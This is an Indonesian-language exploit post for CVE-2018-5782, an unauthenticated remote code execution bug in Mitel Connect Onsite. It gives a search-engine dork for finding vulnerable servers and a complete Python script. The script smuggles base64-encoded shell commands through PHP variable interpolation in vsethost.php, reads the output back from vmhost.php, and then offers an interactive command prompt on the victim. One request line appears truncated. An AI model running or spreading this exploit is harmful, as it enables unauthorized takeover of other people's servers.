CVE 2018-5782: Mitel connect onsite 19.49.5200.0 RCE

CVE: 2018-5782
Title: Mitel connect onsite 19.49.5200.0 RCE
Dork: +"Public" +"My Conferences" +"Personal Library" +"My Profile"

Kerentanan ini menyebabkan penyerang dapat mengakses perintah shell tanpa otenkasi (Unauthenticated).
Beberapa dari situs ini tidak dapat writable menggunakan wget dan curl. Jadi gunakan 'echo' sebagai gantinya

Exploit scripts:
Author: menkrep1337.
Bahasa: python3.
Dependensi: requests.
[ pip install requests ]
Pastebin: https://pastebin.com/raw/nqUgi7gs
'''
import base64, requests, sys

def build_shoretel(cmd):
        obj = {
                "hostId": "system",
                "keyCode": "base64_decode",
                "meetingType": "{${gKeyCode}($gSessionDir)}",
                "sessionDir": base64.b64encode(bytes(cmd, "utf-8")).decode("ascii"),
                "swfServer": "{${gHostID}($gMeetingType)}",
                "server": "exec",
                "dir": "/usr/share/apache2/htdocs/wc2_deploy/scripts/"
        }
        return obj

def exploit():
        if len(sys.argv) < 2: sys.exit("Penggunaan: python shoretel.py <TARGET>")
        url = sys.argv[1]
        c = requests.get(url+"/scripts/vsethost.php",params = build_shoretel("echo bWVua3JlcDEzMzcK">
        if requests.get(url+"/scripts/vmhost.php").text.strip() == "bWVua3JlcDEzMzcK":
                print("Target VULN..!!!")
                while True:
                        cmd = input("SYSTEM: ~$ ")
                        requests.get(url+"/scripts/vsethost.php", params = build_shoretel(cmd))
                        c = requests.get(url+"/scripts/vmhost.php")
                        print(c.text if c.text != "" else "No output")
        else:
                print("Target tidak VULN..!!")

exploit()
'''